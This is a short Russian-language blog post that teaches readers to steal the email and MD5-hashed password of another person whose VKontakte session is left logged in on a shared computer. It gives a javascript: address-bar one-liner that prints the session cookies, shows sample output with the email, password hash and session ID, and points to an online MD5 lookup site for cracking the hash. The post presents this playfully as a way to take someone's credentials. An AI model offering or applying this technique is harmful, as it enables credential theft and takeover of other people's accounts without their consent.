Тырим логин и пароль :)

Мы хотим рассказать вам как находясь у кого-то в гостях или кто-то был у вас и сидел в vkontakte.ru стырить email и захешированный пароль. Тоесть если вы заходите в контакт, а там уже авторизирована чья-то анкета, то без особых знаний и усилий легко узнать мыло и захешированный пароль. Идея состоит в том, что когда человек авторизируется в контакте на его комп записуется в cookie-файл данные для поддержки сеанса юзера(в том числе логин и захешированный пароль). Чтобы посмотреть их необходимо в адресную строку браузера вставить простой javascript-код:

javascript:document.write(document.cookie)

После чего нажать enter. Браузер выведет примерно такую информацию:

remixlang=0; remixchk=5; remixautobookmark=26; remixclosed_tabs=0; lang=0; remixmid=3538196; remixemail=example%mail.ru; remixpass=202cb962ac59075b964b07152d234b70; remixsid=37735c8cc21a992aba688ce1c3a36b397a376b1df46594483a8acff7; remixgroup_closed_tabs=0
remixemail=example%40mail.ru — email аккаунта example@mail.ru
remixpass=202cb962ac59075b964b07152d234b70

— захешированный алгоритмом md5 пароль 202cb962ac59075b964b07152d234b70 к аккаунту. Расшифровать его можно попробовать на http://md5pass.info/rus/ — 100% гарантии нет!!!:(

Понравилась информация - поделись с друзьями!

Опубликовать в Facebook
Опубликовать в Google Buzz
Опубликовать в Google Plus
Опубликовать в LiveJournal
Опубликовать в Мой Мир
Опубликовать в Одноклассники